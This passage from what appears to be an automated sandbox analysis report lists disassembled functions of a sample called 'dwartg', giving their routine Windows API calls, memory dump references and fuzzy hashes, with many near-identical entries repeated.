                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: abf3e51ddf96b9058c26c948dca5341cb1e12e0ed33523a902393f42e4635c21
                                                                                              • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                              • Opcode Fuzzy Hash: abf3e51ddf96b9058c26c948dca5341cb1e12e0ed33523a902393f42e4635c21
                                                                                              • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: 308c43f38c0d4f1e5253cae27ca6764f377ae88c979edcf59885b1af5e75735f
                                                                                              • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                              • Opcode Fuzzy Hash: 308c43f38c0d4f1e5253cae27ca6764f377ae88c979edcf59885b1af5e75735f
                                                                                              • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: 736ae9911c06b90f78c4bb291b7428f7fed3659cb45f2cf43e693535a0f93242
                                                                                              • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                              • Opcode Fuzzy Hash: 736ae9911c06b90f78c4bb291b7428f7fed3659cb45f2cf43e693535a0f93242
                                                                                              • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: c2be0905137ce24624bfa9efb04f20bd29716ec93ccef637b50de2e57d81ba81
                                                                                              • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                              • Opcode Fuzzy Hash: c2be0905137ce24624bfa9efb04f20bd29716ec93ccef637b50de2e57d81ba81
                                                                                              • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: bc85d44ed585accb71ed9e5fc95ff3c1f80a379094c16e36aa2017505e50b318
                                                                                              • Instruction ID: f241060a909f8a8dbc6e6e3c70435d4601ae270483e925a447f8d560710887ed
                                                                                              • Opcode Fuzzy Hash: bc85d44ed585accb71ed9e5fc95ff3c1f80a379094c16e36aa2017505e50b318
                                                                                              • Instruction Fuzzy Hash: E9A001D6AA9252FC310962A16E1ADBB025DC4C5B6AB31A92EF816854C2A8881A691871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: b9ace9524d0d7482d18ed9a9e7149c0db7a019f26bb6a0322e59bac91d6f9b89
                                                                                              • Instruction ID: f241060a909f8a8dbc6e6e3c70435d4601ae270483e925a447f8d560710887ed
                                                                                              • Opcode Fuzzy Hash: b9ace9524d0d7482d18ed9a9e7149c0db7a019f26bb6a0322e59bac91d6f9b89
                                                                                              • Instruction Fuzzy Hash: E9A001D6AA9252FC310962A16E1ADBB025DC4C5B6AB31A92EF816854C2A8881A691871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0074B7BB: GetOEMCP.KERNEL32(00000000,?,?,0074BA44,?), ref: 0074B7E6
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0074BA89,?,00000000), ref: 0074BC64
                                                                                              • GetCPInfo.KERNEL32(00000000,0074BA89,?,?,?,0074BA89,?,00000000), ref: 0074BC77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: ecab868255bb0af639ec4e949942e9c6b4c117b148877fe0e001afcc079d839f
                                                                                              • Instruction ID: b103f32d4360cbaba7d80a98e49fc41b5285a7f55890ebd7174dfc033e8e5156
                                                                                              • Opcode Fuzzy Hash: ecab868255bb0af639ec4e949942e9c6b4c117b148877fe0e001afcc079d839f
                                                                                              • Instruction Fuzzy Hash: 7A512370E002459EDB248F75C8C56BABBF4EF41300F1844AED4968B262D73DEE458F90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00729A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00729A50,?,?,00000000,?,?,00728CBC,?), ref: 00729BAB
                                                                                              • GetLastError.KERNEL32(?,00000000,00728411,-00009570,00000000,000007F3), ref: 00729BB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: f02fbe06cf6c8ed93969910aa2e928e58ee7a08e533afc07f5784c2431702729
                                                                                              • Instruction ID: 4b3857737dd17f2a3eadb6bbc78d664c74ec5593d7e261864ce8b88e254c7fd9
                                                                                              • Opcode Fuzzy Hash: f02fbe06cf6c8ed93969910aa2e928e58ee7a08e533afc07f5784c2431702729
                                                                                              • Instruction Fuzzy Hash: F941D1B1904321CFDB24DF15F58486AB7E6FFD4311F1C8A2DEA8583261E778ED448A91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00721E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00721E55
                                                                                                • Part of subcall function 00723BBA: __EH_prolog.LIBCMT ref: 00723BBF
                                                                                              • _wcslen.LIBCMT ref: 00721EFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: 45e51e5f34de8277eb9a6336f02b1e8ba458b238469c5cc14071293aba32de38
                                                                                              • Instruction ID: 692a5524c0d33b40eb7aa5c8425a48b3b745eb9bc3f35b67fd4eb69f46346cf4
                                                                                              • Opcode Fuzzy Hash: 45e51e5f34de8277eb9a6336f02b1e8ba458b238469c5cc14071293aba32de38
                                                                                              • Instruction Fuzzy Hash: DB314B71905219DFDF15EF98D949AEEFBF6BF58300F6000A9E845A7251C73A5E00CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00729DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007273BC,?,?,?,00000000), ref: 00729DBC
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00729E70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: 0b73550bd56c1d18e36d8a654be4223404e7cdc20ec4cf651f54da2d3016ca21
                                                                                              • Instruction ID: 1a62628f1d2138f256cb8baf570309c8cac28b204b3236b824cf2ea2b52cc20d
                                                                                              • Opcode Fuzzy Hash: 0b73550bd56c1d18e36d8a654be4223404e7cdc20ec4cf651f54da2d3016ca21
                                                                                              • Instruction Fuzzy Hash: AB21F032248355EBC714CF34D891AABBBE4AF51704F08481CF5C583581D32DE90C9BA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00729F27,?,?,0072771A), ref: 007296E6
                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00729F27,?,?,0072771A), ref: 00729716
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 3cdfc3c47ebc03612955d3804147d4fb20b9869d40edd695e8c18e38c3a0cb11
                                                                                              • Instruction ID: c84dbc25079a832fa0836633e22bae32a3f15d0f53cfab400dc5f2c142a5713c
                                                                                              • Opcode Fuzzy Hash: 3cdfc3c47ebc03612955d3804147d4fb20b9869d40edd695e8c18e38c3a0cb11
                                                                                              • Instruction Fuzzy Hash: 5C21BDB1104354AEE3708A65DC89FA7B7DCEB49360F044A19FA96C65D2C7B8A8848671
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00729E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00729EC7
                                                                                              • GetLastError.KERNEL32 ref: 00729ED4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 1e1cb210f5438271c5e599c493c24d116fa7fc034e8f99bb22c23a8efa7970ed
                                                                                              • Instruction ID: cf141fb33ffae7d850fe4ec17f7c908652f3c4040b1b4cfeec97c52057153dec
                                                                                              • Opcode Fuzzy Hash: 1e1cb210f5438271c5e599c493c24d116fa7fc034e8f99bb22c23a8efa7970ed
                                                                                              • Instruction Fuzzy Hash: A8112931A003209BD724C624D844BA6B3E9AB04370F584A29E653D25D0D378ED45C760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00748E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00748E75
                                                                                                • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00761098,007217CE,?,?,00000007,?,?,?,007213D6,?,00000000), ref: 00748EB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                              • String ID:
                                                                                              • API String ID: 2447670028-0
                                                                                              • Opcode ID: d372a2e416fe9b1a284e8acee61186fb4302517586423626e33fd9343b404cdd
                                                                                              • Instruction ID: 08ca70a93ca3b49293cb8b3aca65591e495ada77a9327a0cfc1887a2d15971e9
                                                                                              • Opcode Fuzzy Hash: d372a2e416fe9b1a284e8acee61186fb4302517586423626e33fd9343b404cdd
                                                                                              • Instruction Fuzzy Hash: 10F0F63270123DE6CBA12A259C08F6F37588F82B70F244126F814AB1A1DF7DCD0081A3
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 007310AB
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 007310B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: 49412f6b15881320ed40e33c493424f1d42613377587cd579cfef6e7d1ae9e26
                                                                                              • Instruction ID: 41b39563e812a990cc8248ee986de164608fe688eda5700eb684c3d579a8af07
                                                                                              • Opcode Fuzzy Hash: 49412f6b15881320ed40e33c493424f1d42613377587cd579cfef6e7d1ae9e26
                                                                                              • Instruction Fuzzy Hash: 7AE0D833B00249A7DF0D87B49C059EB73DEEA44345B508175E407E7102F978DE418A60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
